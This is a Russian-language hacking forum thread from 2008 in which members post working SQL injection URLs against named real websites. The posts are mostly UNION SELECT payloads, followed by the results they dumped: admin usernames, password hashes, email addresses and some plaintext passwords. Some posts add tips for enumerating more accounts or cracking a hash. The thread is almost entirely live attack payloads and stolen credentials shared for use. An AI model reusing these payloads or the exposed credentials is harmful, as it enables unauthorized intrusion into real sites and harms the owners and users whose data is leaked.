HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.04.2008, 18:41
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами: 9633635

Репутация: 338
По умолчанию

http://www.taboschar.net/
Код:
http://www.taboschar.net/AllMyGuests/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
Admin:3d89b9b8a6d81b112d4dc41d11ee5375:info@tabosc har.net
 
Ответить с цитированием

  #2  
Старый 20.04.2008, 23:19
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
С нами: 9576027

Репутация: 173
По умолчанию

http://www.thefump.com/lyrics.php?id=-99999+union+select+1,2,3,4,id,6,7,8,9,10,concat_ws (0x3a,username,password,email),12,13+from+users/*

USER: root@localhost
VERSION: 5.0.27-standard
DATABASE: thefump_com_-_fump

всё как на ладоне)

Последний раз редактировалось beerhack; 06.07.2009 в 23:53..
 
Ответить с цитированием

  #3  
Старый 21.04.2008, 01:09
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
С нами: 10026761

Репутация: 91
По умолчанию

http://www.utinam.fr/english/boutique/index.php?FAM_ID=2&RUB_ID=-6+UNION+SELECT+1,2,concat(user,char(58),password), 4,5,6,7,8+FROM+mysql.user/*

root:admin
 
Ответить с цитированием

  #4  
Старый 21.04.2008, 13:33
Tyc00n
Познающий
Регистрация: 13.01.2007
Сообщений: 96
С нами: 10171592

Репутация: 50
По умолчанию

http://l2world.uz/dp/m-search.php?itemname=&monsterid=25009'
Гляньте ,может можно раскрутить ?
 
Ответить с цитированием

  #5  
Старый 21.04.2008, 15:48
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
С нами: 9506924

Репутация: 48
По умолчанию

http://ataman-kpc.ru/?art_id=-8+union+select+1,2,version(),4,5,6,7,8
 
Ответить с цитированием

Доводи до конца ...
  #6  
Старый 21.04.2008, 16:03
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию Доводи до конца ...

Цитата:
Сообщение от Спайдер  
http://ataman-kpc.ru/?art_id=-8+union+select+1,2,version(),4,5,6,7,8
------------------------------------------------------------------------------------------
Цитата:
http://ataman-kpc.ru/?art_id=-8+union+select+1,2,3,concat_ws(0x3a,id,name,usr,pw d),5,6,7,8+from+adm_users
ataman:225ata90man_16
 
Ответить с цитированием

  #7  
Старый 21.04.2008, 18:03
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию

Интернет телевидение
http://tv-portal.ru/index.php?kanal=-57+UNION+SELECT+1,2,concat(id,0x3a,name,0x3a,pass) ,database(),5,user(),7,8,9,10,version()+from+users +limit+1,1/*
database - dbu_kokos32_1@192.168.3.23
user - db_kokos32_2
version - 4.1.21-log

меняем limit+1(2,3,4...),1/* получаем ИД,Имя,Пароль
 
Ответить с цитированием

  #8  
Старый 21.04.2008, 20:03
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
С нами: 10692326

Репутация: 531


По умолчанию

2-=megahertz=- только хз куда эти логины и пассы= )
там авторизаций ничего нету =) а в админку пассы не подходят
 
Ответить с цитированием

  #9  
Старый 21.04.2008, 20:48
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию

NFm попробуй подбери другую таблицу... я кроме юзерс ничего не искал...
 
Ответить с цитированием

  #10  
Старый 21.04.2008, 22:34
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию

Код:
ht_tp://uskniedernsill.us.funpic.de/AllMyGuests0.4.1/index.php?AMG_open=comments&AMG_id=111%20UNION+SELECT+1,2,3,%20concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
stefanhofer : e8cd3fd55a1f0100bb692431c649844c :fc_niedernsill@yahoo.de
Пробую вскрыть хэш!!!

Последний раз редактировалось kair; 21.04.2008 в 22:42..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.